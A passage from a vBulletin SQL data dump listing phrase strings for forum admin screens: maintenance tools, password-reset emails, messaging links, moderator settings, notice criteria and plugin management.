', 'vbulletin', 'vBulletin Solutions', 1219323721, '3.8.0 Alpha 1'), (36481, -1, 'password_vulnerability_email_message_label', 'maintenance', 'Email MessageYou can change the default message that is sent to users when their password is reset.

The tokens {username} and {password} can be placed in the message and will be replaced by their values for each individual user.

You must insert the token {password} in the email.', 'vbulletin', 'vBulletin Solutions', 1219320346, '3.8.0 Alpha 1'), (36482, -1, 'passwords_reset', 'maintenance', 'Passwords Reset', 'vbulletin', 'vBulletin Solutions', 1219315588, '3.8.0 Alpha 1'), (36483, -1, 'php_extensions', 'maintenance', 'PHP Extensions', 'vbulletin', 'vBulletin Solutions', 1158154020, '3.6.1'), (36484, -1, 'php_openbase_dir', 'maintenance', 'PHP Open Basedir', 'vbulletin', 'vBulletin Solutions', 1158154041, '3.6.1'), (36485, -1, 'php_safe_mode', 'maintenance', 'PHP Safe Mode', 'vbulletin', 'vBulletin Solutions', 1158154030, '3.6.1'), (36486, -1, 'please_read_notes_after_completion', 'maintenance', 'Please read the notes at the bottom of this page when processing is complete.', 'vbulletin', '', 0, ''), (36487, -1, 'post_id_to_start_at', 'maintenance', 'Post ID to start at', 'vbulletin', '', 0, ''), (36488, -1, 'posts_queried', 'maintenance', 'Posts Queried', 'vbulletin', '', 0, ''), (36489, -1, 'prefix_change_confirm', 'maintenance', '

If you are sure you want to continue and rename the tables listed\r\nabove, click the rename button below.

\r\n

Note: This is your final chance to stop. Clicking the button below will alter\r\nall the tables listed above, requiring you to edit your config.php file\r\nbefore your vBulletin will work again.

\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36490, -1, 'processing_time_x', 'maintenance', 'Processing Time: {1}', 'vbulletin', '', 0, ''), (36491, -1, 'querying_first_post_of_thread', 'maintenance', 'Querying first post of thread...', 'vbulletin', '', 0, ''), (36492, -1, 'rebuild_album_updates', 'maintenance', 'Rebuild Album Updates', 'vbulletin', 'vBulletin Solutions', 1217327283, '3.8.0 Alpha 1'), (36493, -1, 'rebuild_attachment_thumbnails', 'maintenance', 'Rebuild Attachment Thumbnails', 'vbulletin', '', 0, ''), (36494, -1, 'rebuild_avatar_thumbnails', 'maintenance', 'Rebuild Avatar Thumbnails', 'vbulletin', 'vBulletin Solutions', 1193951620, '3.7.0 Beta 1'), (36495, -1, 'rebuild_custom_avatar_thumbnails', 'maintenance', 'Rebuild Custom Avatar Thumbnails', 'vbulletin', 'vBulletin Solutions', 1194043852, '3.7.0 Beta 1'), (36496, -1, 'rebuild_forum_information', 'maintenance', 'Rebuild Forum Information', 'vbulletin', '', 0, ''), (36497, -1, 'rebuild_post_cache', 'maintenance', 'Rebuild Post Cache', 'vbulletin', '', 0, ''), (36498, -1, 'rebuild_recently_updated_albums_description', 'maintenance', 'This will recalculate the albums to display in the Recently Updated Albums list, effectively removing any albums that are no longer accessible. This may be the case if any users recently made album updates but have since had their album permissions revoked.', 'vbulletin', 'vBulletin Solutions', 1217327232, '3.8.0 Alpha 1'), (36499, -1, 'rebuild_recently_updated_albums_list', 'maintenance', 'Rebuild Recently Updated Albums', 'vbulletin', 'vBulletin Solutions', 1217327084, '3.8.0 Alpha 1'), (36500, -1, 'rebuild_search_index', 'maintenance', 'Rebuild Search Index', 'vbulletin', '', 0, ''), (36501, -1, 'rebuild_sgicon_thumbnails', 'maintenance', 'Rebuild Social Group Icon Thumbnails', 'vbulletin', 'vBulletin Solutions', 1231771209, '3.8.1'), (36502, -1, 'rebuild_similar_threads', 'maintenance', 'Rebuild Similar Threads', 'vbulletin', '', 0, ''), (36503, -1, 'rebuild_statistics', 'maintenance', 'Rebuild Statistics', 'vbulletin', '', 0, ''), (36504, -1, 'rebuild_statistics_warning', 'maintenance', 'Rebuilding statistics will cause the loss of the total forum view and active users data. Only run this if you believe you really need to! Once the data has been replaced, there is no way to restore your database.', 'vbulletin', 'vBulletin Solutions', 1150106903, '3.6.0 Beta 2'), (36505, -1, 'rebuild_styles', 'maintenance', 'Rebuild Styles', 'vbulletin', '', 0, ''), (36506, -1, 'rebuild_thread_information', 'maintenance', 'Rebuild Thread Information', 'vbulletin', '', 0, ''), (36507, -1, 'rebuild_user_reputation', 'maintenance', 'Rebuild User Reputation', 'vbulletin', '', 0, ''), (36508, -1, 'recalculate_users_post_counts_warning', 'maintenance', 'This will recalculate all of your user\'s post counts based on their CURRENT posts in the database. Do not run this if you have pruned posts, manually changed post counts, or imported from another forum package and you wish to maintain your users\' current counts. Your members\' post counts will PROBABLY decrease so only run this if you believe you really need to! Once they decrease you cannot bring them back up without restoring your database or manually editing each user. You have been warned!', 'vbulletin', '', 0, ''), (36509, -1, 'remove_orphan_posts', 'maintenance', 'Remove Orphan Posts', 'vbulletin', '', 0, ''), (36510, -1, 'remove_orphan_threads', 'maintenance', 'Remove Orphan Threads', 'vbulletin', '', 0, ''), (36511, -1, 'removing_duplicate_threads', 'maintenance', 'Removing duplicate threads...', 'vbulletin', '', 0, ''), (36512, -1, 'removing_orphan_threads', 'maintenance', 'Removing Orphan Threads', 'vbulletin', '', 0, ''), (36513, -1, 'rename_sql_tables', 'maintenance', 'Rename SQL Tables', 'vbulletin', '', 0, ''), (36514, -1, 'rename_table_x', 'maintenance', 'Rename Table {1}?\r\n', 'vbulletin', '', 0, ''), (36515, -1, 'rename_tables', 'maintenance', 'Rename Tables\r\n', 'vbulletin', '', 0, ''), (36516, -1, 'renaming_process_complete', 'maintenance', 'Renaming Process Complete\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36517, -1, 'renaming_table_with_new_prefix', 'maintenance', 'Renaming Tables With New Table Prefix', 'vbulletin', '', 0, ''), (36518, -1, 'renaming_x_to_y', 'maintenance', 'Renaming {1} to {2} ... ', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36519, -1, 'renumber_all_templates_from_one', 'maintenance', 'Renumber all templates from 1 Note: this option requires that your MySQL account has ALTER, CREATE and DROP privileges.
If you are not sure, do not use this option!
', 'vbulletin', '', 0, ''), (36520, -1, 'reputation_base', 'maintenance', 'Base Reputation Value', 'vbulletin', '', 0, ''), (36521, -1, 'reset_accounts_with_last_activity', 'maintenance', 'Reset Accounts with Last Activity', 'vbulletin', 'vBulletin Solutions', 1219244638, '3.8.0 Alpha 1'), (36522, -1, 'reset_password_if_email_failed', 'maintenance', 'Reset Password if Email Failed\r\nThis option allows you to reset the password even if the email attempt failed. Only choose this option if the email attempts are failing consistently.', 'vbulletin', 'vBulletin Solutions', 1220350745, '3.8.0 Alpha 1'), (36523, -1, 'reset_passwords', 'maintenance', 'Reset Passwords', 'vbulletin', 'vBulletin Solutions', 1219243428, '3.8.0 Alpha 1'), (36524, -1, 'reset_passwords_for_users_with_language', 'maintenance', 'Reset Passwords for Accounts Using LanguageOnly reset and notify users who have their accounts configured to use this language.', 'vbulletin', 'vBulletin Solutions', 1222095712, '3.8.0 Alpha 2'), (36525, -1, 'reset_vulnerable_passwords', 'maintenance', 'Reset Vulnerable Passwords', 'vbulletin', 'vBulletin Solutions', 1219323829, '3.8.0 Alpha 1'), (36526, -1, 'send_info', 'maintenance', 'Send Information', 'vbulletin', 'vBulletin Solutions', 1158154140, '3.6.1'), (36527, -1, 'set_all_no', 'maintenance', 'Set All No', 'vbulletin', '', 0, ''), (36528, -1, 'set_all_yes', 'maintenance', 'Set All Yes\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36529, -1, 'some_errors_occured_while_resetting_passwords', 'maintenance', 'Some errors occurred while resetting passwords. The affected accounts did not have their password reset.', 'vbulletin', 'vBulletin Solutions', 1240226395, '3.8.3'), (36530, -1, 'some_errors_occured_while_sending_emails', 'maintenance', 'Some errors occurred while sending emails to the users. The affected accounts did not have their password reset, unless you chose to reset the password even when emailing failed.', 'vbulletin', 'vBulletin Solutions', 1240226573, '3.8.3'), (36531, -1, 'system_architecture', 'maintenance', 'System Architecture', 'vbulletin', 'vBulletin Solutions', 1158153997, '3.6.1'), (36532, -1, 'table_name', 'maintenance', 'Table Name\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36533, -1, 'table_x_does_not_exist', 'maintenance', 'Table \'{1}\' does not exist!\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36534, -1, 'tableprefix_change_completed', 'maintenance', '

This script has now completed.
\r\nYour table prefix has been changed from \'{1}\' to \'{2}\'.

\r\n

You must now edit your includes/config.php file to include the line:

\r\n
$config[\'Database\'][\'tableprefix\'] = \'{2}\';
\r\n

Your vBulletin installation will not function until you do this.

\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36535, -1, 'this_script_will_allow_you_to_rename_your_vb_tables', 'maintenance', '

This script will allow you to rename your vBulletin SQL tables in order to accommodate a new table prefix value in includes/config.php.

\r\n

Note: Do not alter the tableprefix value in config.php until this script has completed and you are given a message telling you to edit the value.

\r\n

Your table prefix is currently set to \'{1}\'.

', 'vbulletin', '', 0, ''), (36536, -1, 'threaded_mode_usage', 'maintenance', 'Threaded Mode Usage', 'vbulletin', 'vBulletin Solutions', 1158154084, '3.6.1'), (36537, -1, 'thumbnail_quality', 'maintenance', 'Quality of JPG thumbnails (0 .. 100)', 'vbulletin', '', 0, ''), (36538, -1, 'today', 'maintenance', 'Today', 'vbulletin', 'vBulletin Solutions', 1219232905, '3.8.0 Alpha 1'), (36539, -1, 'total_forums', 'maintenance', 'Total Forums', 'vbulletin', 'vBulletin Solutions', 1158154095, '3.6.1'), (36540, -1, 'total_number_posts_process', 'maintenance', 'Total number of posts to process: (0 for unlimited)', 'vbulletin', '', 0, ''), (36541, -1, 'total_posts', 'maintenance', 'Total Posts', 'vbulletin', 'vBulletin Solutions', 1158154062, '3.6.1'), (36542, -1, 'total_posts_processed_x', 'maintenance', 'Total Posts Processed: {1}', 'vbulletin', '', 0, ''), (36543, -1, 'total_usergroups', 'maintenance', 'Total Usergroups', 'vbulletin', 'vBulletin Solutions', 1158154107, '3.6.1'), (36544, -1, 'total_users', 'maintenance', 'Total Users', 'vbulletin', 'vBulletin Solutions', 1158154074, '3.6.1'), (36545, -1, 'unable_to_read_avatar', 'maintenance', 'Unable to read avatar', 'vbulletin', 'vBulletin Solutions', 1207321358, '3.7.0 Release Candidate 3'), (36546, -1, 'update_post_counts', 'maintenance', 'Update Post Counts', 'vbulletin', '', 0, ''), (36547, -1, 'update_user_titles', 'maintenance', 'Update User Titles and Ranks', 'vbulletin', '', 0, ''), (36548, -1, 'update_usernames', 'maintenance', 'Update User Names', 'vbulletin', '', 0, ''), (36549, -1, 'updating_forums', 'maintenance', 'Updating Forums', 'vbulletin', '', 0, ''), (36550, -1, 'updating_similar_threads', 'maintenance', 'Updating Similar Threads', 'vbulletin', '', 0, ''), (36551, -1, 'updating_threads', 'maintenance', 'Updating Threads', 'vbulletin', '', 0, ''), (36552, -1, 'updating_user_info', 'maintenance', 'Updating user info...', 'vbulletin', '', 0, ''), (36553, -1, 'updating_usernames', 'maintenance', 'Updating User Names', 'vbulletin', '', 0, ''), (36554, -1, 'vbulletin_table_prefix_rename_system', 'maintenance', 'vBulletin 3 Table Prefix Rename System', 'vbulletin', '', 0, ''), (36555, -1, 'vbulletin_version', 'maintenance', 'vBulletin Version', 'vbulletin', 'vBulletin Solutions', 1158153978, '3.6.1'), (36556, -1, 'vulnerable_password_reset_email', 'maintenance', 'Dear {username},\r\n\r\nA vulnerability has been found with your password at {1}. Some passwords are vulnerable to exploitation which may allow a third party to hijack your account.\r\n\r\nThis may lead to your account being used without your knowledge or permission, and actions being performed under your name.\r\n\r\nVulnerable accounts can also be bad for the board as a whole as they may enable access for automated tools to spam both the forums and other user accounts, \r\nusing your username.\r\n\r\nAs such we have had to reset your password.\r\nYou can find your new login details below.\r\n\r\nUsername: {username}\r\nPassword: {password}\r\n\r\nIf you want to change your password, login with the above details at the following location:\r\n{2}/profile.php?do=editpassword\r\n\r\n\r\nWe apologize for any inconvenience this may cause and appreciate your understanding.\r\n\r\n\r\n\r\nAll the best,\r\n{1}', 'vbulletin', 'vBulletin Solutions', 1219317885, '3.8.0 Alpha 1'), (36557, -1, 'vulnerable_password_reset_email_subject', 'maintenance', '{1} - Account Password Vulnerability', 'vbulletin', 'vBulletin Solutions', 1219249512, '3.8.0 Alpha 1'), (36558, -1, 'x_accounts_processed', 'maintenance', '{1} accounts processed', 'vbulletin', 'vBulletin Solutions', 1219329223, '3.8.0 Alpha 1'), (36559, -1, 'x_of_y_passwords_were_reset', 'maintenance', '{1} of {2} password(s) were reset', 'vbulletin', 'vBulletin Solutions', 1219833526, '3.8.0 Alpha 1'), (36560, -1, 'you_have_chosen_to_rename_the_following_tables', 'maintenance', 'You have chosen to rename the following tables', 'vbulletin', '', 0, ''), (36561, -1, 'add_x_to_your_contact_list', 'messaging', 'Add {1} to your contact list', 'vbulletin', '', 0, ''), (36562, -1, 'aim', 'messaging', 'AIM', 'vbulletin', '', 0, ''), (36563, -1, 'aim_hi_are_you_there', 'messaging', 'Hi.+Are+you+there?', 'vbulletin', '', 0, ''), (36564, -1, 'email_subject', 'messaging', 'Email Subject', 'vbulletin', '', 0, ''), (36565, -1, 'email_to_friend', 'messaging', 'Email to Friend', 'vbulletin', '', 0, ''), (36566, -1, 'from', 'messaging', 'From', 'vbulletin', '', 0, ''), (36567, -1, 'icq', 'messaging', 'ICQ', 'vbulletin', '', 0, ''), (36568, -1, 'message_dialog', 'messaging', 'Message Dialog', 'vbulletin', 'vBulletin Solutions', 1194867683, '3.7.0 Beta 1'), (36569, -1, 'msn', 'messaging', 'MSN', 'vbulletin', '', 0, ''), (36570, -1, 'msn_functions_only_work_in_ie', 'messaging', 'The MSN Messenger / Windows Messenger / Live Messenger functions only work when launched from Internet Explorer on a system with the Messenger application configured and running.', 'vbulletin', 'vBulletin Solutions', 1212579909, '3.8.0 Alpha 1'), (36571, -1, 'online_status', 'messaging', 'Online Status', 'vbulletin', '', 0, ''), (36572, -1, 'other', 'messaging', 'Other', 'vbulletin', '', 0, ''), (36573, -1, 'private_message', 'messaging', 'Private Message', 'vbulletin', 'vBulletin Solutions', 1220978710, '3.8.0 Alpha 1'), (36574, -1, 'recipient_email_address', 'messaging', 'Recipient Email Address', 'vbulletin', '', 0, ''), (36575, -1, 'recipient_name', 'messaging', 'Recipient Name', 'vbulletin', '', 0, ''), (36576, -1, 'report_bad_post', 'messaging', 'Report Post', 'vbulletin', 'vBulletin Solutions', 1153239749, '3.6.0 Release Candidate 3'), (36577, -1, 'report_bad_private_message', 'messaging', 'Report Private Message', 'vbulletin', 'vBulletin Solutions', 1220978673, '3.8.0 Alpha 1'), (36578, -1, 'send_email_to_forum_administrator', 'messaging', 'Send an Email to the Forum Administrator', 'vbulletin', '', 0, ''), (36579, -1, 'send_message', 'messaging', 'Send Message', 'vbulletin', '', 0, ''), (36580, -1, 'send_message_via_aim_to_x_link', 'messaging', 'Send Message Via AIM to {2}', 'vbulletin', '', 0, ''), (36581, -1, 'send_message_via_email_to_x_link', 'messaging', 'Send a message via Email to {2}', 'vbulletin', '', 0, ''), (36582, -1, 'send_message_via_icq_to_x_link', 'messaging', 'Send Message Via ICQ to {2}', 'vbulletin', '', 0, ''), (36583, -1, 'send_message_via_msn_to_x_link', 'messaging', 'Send Message Via MSN to {2}', 'vbulletin', '', 0, ''), (36584, -1, 'send_message_via_skype_to_x_link', 'messaging', 'Send Message Via Skype™ to {2}', 'vbulletin', '', 0, ''), (36585, -1, 'send_message_via_x_to_y', 'messaging', 'Send message via {1} to {2}', 'vbulletin', '', 0, ''), (36586, -1, 'send_message_via_yahoo_to_x_link', 'messaging', 'Send Message Via Yahoo! to {2}', 'vbulletin', '', 0, ''), (36587, -1, 'send_page_to_a_friend', 'messaging', 'Send Page to a Friend', 'vbulletin', '', 0, ''), (36588, -1, 'send_x_a_message', 'messaging', 'Send {1} a message', 'vbulletin', '', 0, ''), (36589, -1, 'skype', 'messaging', 'Skype™', 'vbulletin', '', 0, ''), (36590, -1, 'skype_add_contact', 'messaging', 'Add to Skype contact list', 'vbulletin', '', 0, ''), (36591, -1, 'skype_leave_voicemail', 'messaging', 'Leave voicemail using Skype', 'vbulletin', '', 0, ''), (36592, -1, 'skype_send_file', 'messaging', 'Send a file using Skype', 'vbulletin', '', 0, ''), (36593, -1, 'skype_start_call', 'messaging', 'Start Skype voice call', 'vbulletin', '', 0, ''), (36594, -1, 'skype_start_chat', 'messaging', 'Start Skype text chat', 'vbulletin', '', 0, ''), (36595, -1, 'skype_view_profile', 'messaging', 'View Skype profile', 'vbulletin', '', 0, ''), (36596, -1, 'these_functions_require_aim', 'messaging', 'Please note that these functions require that you actually have the AOL Instant Messenger application installed on your computer.', 'vbulletin', '', 0, ''), (36597, -1, 'these_functions_require_msn', 'messaging', 'Please note that these functions require that you be logged into either MSN Messenger or Windows Messenger. You will not be able to send messages to the email address that you are logged into MSN/Windows Messenger with.', 'vbulletin', 'vBulletin Solutions', 1169462061, '3.6.5'), (36598, -1, 'these_functions_require_skype', 'messaging', 'These functions require Skype™ to be installed.', 'vbulletin', '', 0, ''), (36599, -1, 'thought_might_be_interested', 'messaging', 'I thought you might be interested in reading this web page:\r\n{1}/showthread.php?t={2}&referrerid={3}\r\n\r\nFrom,\r\n{4}', 'vbulletin', 'vBulletin Solutions', 1161596584, '3.6.3'), (36600, -1, 'using_form_email_available_to_user', 'messaging', 'Note: By using this form, your email address will become available to the user who you are emailing.', 'vbulletin', '', 0, ''), (36601, -1, 'view_the_profile_of_x', 'messaging', 'View the profile of {1}', 'vbulletin', '', 0, ''), (36602, -1, 'yahoo', 'messaging', 'Yahoo!', 'vbulletin', '', 0, ''), (36603, -1, 'you_must_be_logged_into_msn_before_doing_this', 'messaging', 'You must be logged into MSN or Windows Messenger before doing this.', 'vbulletin', '', 0, ''), (36604, -1, 'your_details', 'messaging', 'Your Details', 'vbulletin', '', 0, ''), (36605, -1, 'your_name', 'messaging', 'Your Name', 'vbulletin', '', 0, ''), (36606, -1, 'add_new_moderator_to_forum_x', 'moderator', 'Add New Moderator to Forum {1}', 'vbulletin', '', 0, ''), (36607, -1, 'are_you_sure_want_to_delete_moderator_x', 'moderator', 'Are you sure you want to delete the moderator called \'{1}\'?
({2}: {3})

{4} This action cannot be undone and may cause this user to be returned to the default, registered group.', 'vbulletin', 'vBulletin Solutions', 1194350596, '3.7.0 Beta 1'), (36608, -1, 'are_you_sure_you_want_to_delete_this_moderator', 'moderator', 'Are you sure you want to delete this Moderator? This action may cause this user to be returned to the default, registered group.', 'vbulletin', 'vBulletin Solutions', 1194350551, '3.7.0 Beta 1'), (36609, -1, 'can_delete_albums_pictures', 'moderator', 'Can Delete Albums/Pictures', 'vbulletin', 'vBulletin Solutions', 1192541547, '3.7.0 Beta 1'), (36610, -1, 'can_edit_albums_pictures', 'moderator', 'Can Edit Albums/Pictures', 'vbulletin', 'vBulletin Solutions', 1192541527, '3.7.0 Beta 1'), (36611, -1, 'can_edit_user_reputation_comments', 'moderator', 'Can Edit User Reputation Comments', 'vbulletin', '', 0, ''), (36612, -1, 'change_moderator_primary_usergroup_to', 'moderator', 'Change Moderator\'s Primary Usergroup to', 'vbulletin', '', 0, ''), (36613, -1, 'edit_moderator_x_for_forum_y', 'moderator', 'Edit Moderator
{1} for Forum {2}', 'vbulletin', '', 0, ''), (36614, -1, 'email_preferences', 'moderator', 'Email Preferences', 'vbulletin', '', 0, ''), (36615, -1, 'error_occurred_while_making_users_moderators', 'moderator', 'An error occurred while making the following users moderators:', 'vbulletin', 'vBulletin Solutions', 1200491592, '3.7.0 Beta 4'), (36616, -1, 'if_you_would_like_to_remove_this_moderator', 'moderator', 'If You Would Like to Remove this Moderator', 'vbulletin', '', 0, ''), (36617, -1, 'make_moderator_a_member_of', 'moderator', 'Make Moderator a Member of', 'vbulletin', '', 0, ''), (36618, -1, 'moderator_manager', 'moderator', 'Moderator Manager', 'vbulletin', '', 0, ''), (36619, -1, 'more_than_x_days_ago', 'moderator', 'More Than {1} Days Ago', 'vbulletin', '', 0, ''), (36620, -1, 'receive_email_on_new_post', 'moderator', 'Receive Email When a New Post is Created', 'vbulletin', '', 0, ''), (36621, -1, 'receive_email_on_new_thread', 'moderator', 'Receive Email When a New Thread is Created', 'vbulletin', '', 0, ''), (36622, -1, 'remove_moderator_from_all_forums', 'moderator', 'Remove this Moderator from All Forums', 'vbulletin', '', 0, ''), (36623, -1, 'super_moderator_permissions', 'moderator', 'Super Moderator Permissions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36624, -1, 'super_moderators', 'moderator', 'Super Moderators', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36625, -1, 'the_following_users_were_made_moderators', 'moderator', 'The following users were successfully made moderators:', 'vbulletin', 'vBulletin Solutions', 1200490926, '3.7.0 Beta 4'), (36626, -1, 'there_are_no_moderators', 'moderator', 'There are no assigned moderators.', 'vbulletin', 'vBulletin Solutions', 1170199983, '3.6.5'), (36627, -1, 'user_album_permissions', 'moderator', 'User Album Permissions', 'vbulletin', 'vBulletin Solutions', 1192541510, '3.7.0 Beta 1'), (36628, -1, 'are_you_sure_want_to_delete_notice_x', 'notice', 'Are you sure you want to permanently delete the notice {1}?
({2}={3})
\r\n
\r\nThis operation cannot be un-done.', 'vbulletin', 'vBulletin Solutions', 1189781846, '3.6.8'), (36629, -1, 'browsing_forum_x_and_children_criteria', 'notice', 'User is browsing forum {1} or one of its child forums', 'vbulletin', 'vBulletin Solutions', 1189612492, '3.6.8'), (36630, -1, 'browsing_forum_x_criteria', 'notice', 'User is browsing forum {1}', 'vbulletin', 'vBulletin Solutions', 1189612474, '3.6.8'), (36631, -1, 'criterion_is_active', 'notice', 'Criterion is Active', 'vbulletin', 'vBulletin Solutions', 1189776085, '3.6.8'), (36632, -1, 'dismissible', 'notice', 'Dismissible', 'vbulletin', 'vBulletin Solutions', 1219006214, '3.8.0 Alpha 1'), (36633, -1, 'display_notice_if_elipsis', 'notice', 'Display this notice if...', 'vbulletin', 'vBulletin Solutions', 1189775515, '3.6.8'), (36634, -1, 'edit_notice', 'notice', 'Edit Notice', 'vbulletin', 'vBulletin Solutions', 1189775392, '3.6.8'), (36635, -1, 'has_never_posted_criteria', 'notice', 'User has never posted', 'vbulletin', 'vBulletin Solutions', 1189767510, '3.6.8'), (36636, -1, 'has_x_infraction_points_criteria', 'notice', 'User has between {1} and {2} infraction points', 'vbulletin', 'vBulletin Solutions', 1189687099, '3.6.8'), (36637, -1, 'has_x_postcount_criteria', 'notice', 'User\'s post-count is between {1} and {2} posts', 'vbulletin', 'vBulletin Solutions', 1189767137, '3.6.8'), (36638, -1, 'has_x_reputation_criteria', 'notice', 'User has between {1} and {2} reputation points', 'vbulletin', 'vBulletin Solutions', 1189687718, '3.6.8'), (36639, -1, 'in_coventry_criteria', 'notice', 'User is in Coventry (global ignore)', 'vbulletin', 'vBulletin Solutions', 1189613306, '3.6.8'), (36640, -1, 'in_usergroup_x_criteria', 'notice', 'User belongs to usergroup {1}', 'vbulletin', 'vBulletin Solutions', 1189612323, '3.6.8'), (36641, -1, 'is_birthday_criteria', 'notice', 'User\'s birthday is today', 'vbulletin', 'vBulletin Solutions', 1189612512, '3.6.8'), (36642, -1, 'is_date_criteria', 'notice', 'The date is {1} {2} (Use dd-mm-yyyy format)', 'vbulletin', 'vBulletin Solutions', 1212762443, '3.8.0 Alpha 1'), (36643, -1, 'is_time_criteria', 'notice', 'The time is between {1} and {2} {3} (Use hh:mm 24 hour format)', 'vbulletin', 'vBulletin Solutions', 1212762416, '3.8.0 Alpha 1'), (36644, -1, 'no_posts_in_x_days_criteria', 'notice', 'User has not posted for {1} days or more (but has posted previously)', 'vbulletin', 'vBulletin Solutions', 1189767321, '3.6.8'), (36645, -1, 'no_visit_in_x_days_criteria', 'notice', 'User has not visited for {1} days or more', 'vbulletin', 'vBulletin Solutions', 1189687293, '3.6.8'), (36646, -1, 'not_in_usergroup_x_criteria', 'notice', 'User does not belong to usergroup {1}', 'vbulletin', 'vBulletin Solutions', 1189612342, '3.6.8'), (36647, -1, 'notice_html', 'notice', 'Notice HTML', 'vbulletin', 'vBulletin Solutions', 1189698555, '3.6.8'), (36648, -1, 'notice_html_description', 'notice', 'This is the HTML that will be shown to visitors when the conditions set below are met.
\r\n
\r\nYou may include the following special variables in the HTML:
\r\n{userid}, {username}, {musername}, {sessionurl}', 'vbulletin', 'vBulletin Solutions', 1189776671, '3.6.8'), (36649, -1, 'notice_title_description', 'notice', 'This text is used solely in the Admin CP', 'vbulletin', 'vBulletin Solutions', 1189776415, '3.6.8'), (36650, -1, 'notice_x_not_displayed_criteria', 'notice', 'Criteria for notice {1} are not met', 'vbulletin', 'vBulletin Solutions', 1206707239, '3.7.0 Release Candidate 2'), (36651, -1, 'persistent', 'notice', 'Persistent', 'vbulletin', 'vBulletin Solutions', 1189774634, '3.6.8'), (36652, -1, 'persistent_description', 'notice', 'If this option is set to \'No\', the notice will be shown only once per visit to each user.', 'vbulletin', 'vBulletin Solutions', 1189776982, '3.6.8'), (36653, -1, 'pm_storage_x_percent_full_criteria', 'notice', 'User\'s private message storage is between {1}% and {2}% full', 'vbulletin', 'vBulletin Solutions', 1189687241, '3.6.8'), (36654, -1, 'style_is_x_criteria', 'notice', 'User is browsing using style {1}', 'vbulletin', 'vBulletin Solutions', 1189779007, '3.6.8'), (36655, -1, 'user_timezone', 'notice', 'User\'s Timezone', 'vbulletin', 'vBulletin Solutions', 1212762396, '3.8.0 Alpha 1'), (36656, -1, 'username_is_criteria', 'notice', 'User\'s username is {1}', 'vbulletin', 'vBulletin Solutions', 1189612541, '3.6.8'), (36657, -1, 'utc_universal_time', 'notice', 'UTC / Universal Time', 'vbulletin', 'vBulletin Solutions', 1212762382, '3.8.0 Alpha 1'), (36658, -1, 'add_import_product', 'plugins', 'Add/Import Product', 'vbulletin', '', 0, ''), (36659, -1, 'add_new_install_uninstall_code', 'plugins', 'Add New Install/Uninstall Code', 'vbulletin', '', 0, ''), (36660, -1, 'add_new_plugin', 'plugins', 'Add New Plugin', 'vbulletin', '', 0, ''), (36661, -1, 'add_new_product', 'plugins', 'Add New Product', 'vbulletin', '', 0, ''), (36662, -1, 'add_new_product_dependency', 'plugins', 'Add New Product Dependency', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36663, -1, 'allow_overwrite_upgrade_product', 'plugins', 'Allow Overwrite
If you wish to upgrade a product, you must set this to yes.', 'vbulletin', '', 0, ''), (36664, -1, 'are_you_sure_want_to_delete_plugin_x', 'plugins', 'Are you sure you want to delete the plugin called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (36665, -1, 'are_you_sure_want_to_delete_product_x', 'plugins', 'Are you sure you want to uninstall the product called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (36666, -1, 'check_version', 'plugins', 'Check Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36667, -1, 'click_here_for_more_info', 'plugins', 'Click here for more information!', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36668, -1, 'compatibility_starts', 'plugins', 'Compatibility Starts', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36669, -1, 'compatibility_starts_with_version', 'plugins', 'Compatibility Starts With Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36670, -1, 'compatible_starting_with_x', 'plugins', 'Compatible starting with {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36671, -1, 'dependency_type', 'plugins', 'Dependency Type', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36672, -1, 'edit_plugin_x', 'plugins', 'Edit Plugin {1}', 'vbulletin', '', 0, ''), (36673, -1, 'edit_product_x', 'plugins', 'Edit Product {1}', 'vbulletin', '', 0, ''), (36674, -1, 'existing_install_uninstall_code', 'plugins', 'Existing Install/Uninstall Code', 'vbulletin', '', 0, ''), (36675, -1, 'existing_product_dependencies', 'plugins', 'Existing Product Dependencies', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36676, -1, 'hook_location', 'plugins', 'Hook Location', 'vbulletin', 'vBulletin Solutions', 1225804973, '3.8.0 Beta 2'), (36677, -1, 'hook_location_desc', 'plugins', 'This specifies the location within the vBulletin code of the hook that will fire this plugin function.', 'vbulletin', '', 0, ''), (36678, -1, 'import_plugin_xml_file', 'plugins', 'Import Plugin Definitions XML File', 'vbulletin', '', 0, ''), (36679, -1, 'import_product', 'plugins', 'Import Product', 'vbulletin', '', 0, ''), (36680, -1, 'importing_plugins', 'plugins', 'Importing Plugin Definitions', 'vbulletin', '', 0, ''), (36681, -1, 'importing_product', 'plugins', 'Importing Product', 'vbulletin', '', 0, ''), (36682, -1, 'incompatible_with', 'plugins', 'Incompatible With', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36683, -1, 'incompatible_with_version_and_newer', 'plugins', 'Incompatible With Version\r\n(And newer versions)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36684, -1, 'incompatible_with_x_and_greater', 'plugins', 'Incompatible with {1} and greater', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36685, -1, 'install_code', 'plugins', 'Install Code', 'vbulletin', '', 0, ''), (36686, -1, 'installed_products', 